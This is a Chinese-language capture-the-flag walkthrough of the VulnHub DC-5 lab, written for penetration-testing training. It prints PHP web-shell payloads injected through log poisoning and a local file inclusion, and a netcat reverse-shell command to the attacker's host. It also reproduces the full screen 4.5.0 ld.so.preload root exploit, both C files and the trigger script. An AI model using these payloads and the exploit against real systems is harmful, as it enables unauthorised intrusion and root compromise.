靶场练习第十三天~vulnhub靶场之dc-5

一、准备工作

1.靶机环境搭建

下载链接: https://pan.baidu.com/s/1csvuJ_NVCBvVr75KhxyM3Q?pwd=xie7 提取码: xie7

2.kali的ip

命令：ifconfig

3.kali和靶机的都设置为NAT模式

二、信息收集

1.nmap的信息收集

（1）寻找靶机的ip

命令： nmap 192.168.101.0/24

（2）查看靶机的端口及其协议

命令：nmap -A 192.168.101.118

命令2：nmap -sV -p- 192.168.101.118 （-sV是用来扫描目标主机和端口上运行的软件的版本 ）

2.网页的信息收集

（3）访问192.168.101.118

因为靶机开放了80端口，访问一下网站

翻一下网站的页面功能后，点击打开contact页面的提交留言后，出现改变

改变前：

改变后： contact页面的年份信息会随着刷新页面而变化

访问http://192.168.101.118/footer.php

用dirb扫描一下网站

命令 ：dirb http://192.168.101.118 -X .php .html .txt

发现成功文件包含

因为靶机服务扫描时发现靶机网站使用的是nginx服务器，我们知道nginx服务器的默认配置文件是/etc/nginx/nginx.conf，所以将nginx的配置文件包含过来查看日志路径，发现了nginx的日志路径

查看日志文件 /var/log/nginx/access.log通过bp抓包写入一句话木马

一句话木马语句：<?php @eval($_POST[value]); ?>

通过日志文件log查看是否写入成功；

日志路径为：/var/log/nginx/access.log，是系统默认路径

通过firefox浏览器打开（URL：http://192.168.85.144/thankyou.php?file=/var/log/nginx/access.log），发现一句话木马已经写入成功。 通过BurpSuite抓包，并写入PHP的执行系统命令

语句： <?php passthru($_GET['hh']); ?>

进行测试，看是否外部命令是否能够正常执行的；
命令：http://192.168101.118/thankyou.php?file=/var/log/nginx/access.log&hh=cat%20/etc/passwd

发现已经执行命令

 

（4）通过nc命令直接进行shell反弹

1.在网页url添加命令：hh= nc 192.168.101.10 4444 -c /bin/bash

2.kali开启添加，命令： nc -lvvp 4444

（5）优化命令执行终端

执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

三、渗透

1.查看具有特殊权限的二进制文件

查找一下可以用root权限运行的命令；
命令： find / -perm -u=s -type f 2>/dev/null

由上图可知发现了一个screen特殊文件

2.searchsploit命令对screen-4.5.0漏洞进行搜索

kali终端使用命令：searchsploit screen-4.5.0

3.将该41154.sh文件拷贝到/root目录下

4. 漏洞脚本文件的利用

将41154.sh中上面一部分c语言代码另存为libhax.c 编译libhax.c文件
命令：gcc -fPIC -shared -ldl -o libhax.so libhax.c

#include <stdio.h>

#include <sys/types.h>

#include <unistd.h>

__attribute__ ((__constructor__))

void dropshell(void){

chown("/tmp/rootshell", 0, 0);

chmod("/tmp/rootshell", 04755);

unlink("/etc/ld.so.preload");

printf("[+] done!\n");

}

将41154.sh中下面一部分c语言代码另存为rootshell.c 编译rootshell.c文件

命令： sudo vim rootshell.c、cat rootshell.c、gcc -o rootshell rootshell.c

#include <stdio.h>

int main(void){

setuid(0);

setgid(0);

seteuid(0);

setegid(0);

execvp("/bin/sh", NULL, NULL);

}

将41154.sh中剩下部分代码另存为dc5.sh脚本文件
并在保存dc5.sh文件输入 :set ff=unix ，否则在执行脚本文件时后出错

#!/bin/bash

# screenroot.sh

# setuid screen v4.5.0 local root exploit

# abuses ld.so.preload overwriting to get root.

# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html

# HACK THE PLANET

# ~ infodox (25/1/2017)

echo "~ gnu/screenroot ~"

echo "[+] First, we create our shell and library..."

cat << EOF > /tmp/libhax.c

#include <stdio.h>

EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

rm -f /tmp/libhax.c

cat << EOF > /tmp/rootshell.c

EOF

gcc -o /tmp/rootshell /tmp/rootshell.c

rm -f /tmp/rootshell.c

echo "[+] Now we create our /etc/ld.so.preload file..."

cd /etc

umask 000 # because

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed

echo "[+] Triggering..."

screen -ls # screen itself is setuid, so...

/tmp/rootshell

5.再次使用nc命令将文件上传到靶机

进入到kali的tmp，分别输入

nc 192.168.101.10 4444 >libhax.so

nc 192.168.101.10 4444 >rootshell

nc 192.168.101.10 4444 >dc5.sh

反向连接靶机的那一端，分别输入

nc -lvvp 4444 < libhax.so

nc -lvvp 4444 < rootshell

nc -lvvp 4444 <dc5.sh

靶机和kali都要进入到tmp目录下面，注意kali与靶机输入时要一一对应

四、提权

1.输入如下命令进行提权

cd /etc

umask 000

screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

screnn -ls

/tmp/rootshell

2.拿下flag

cd /root

cat thisistheflag.txt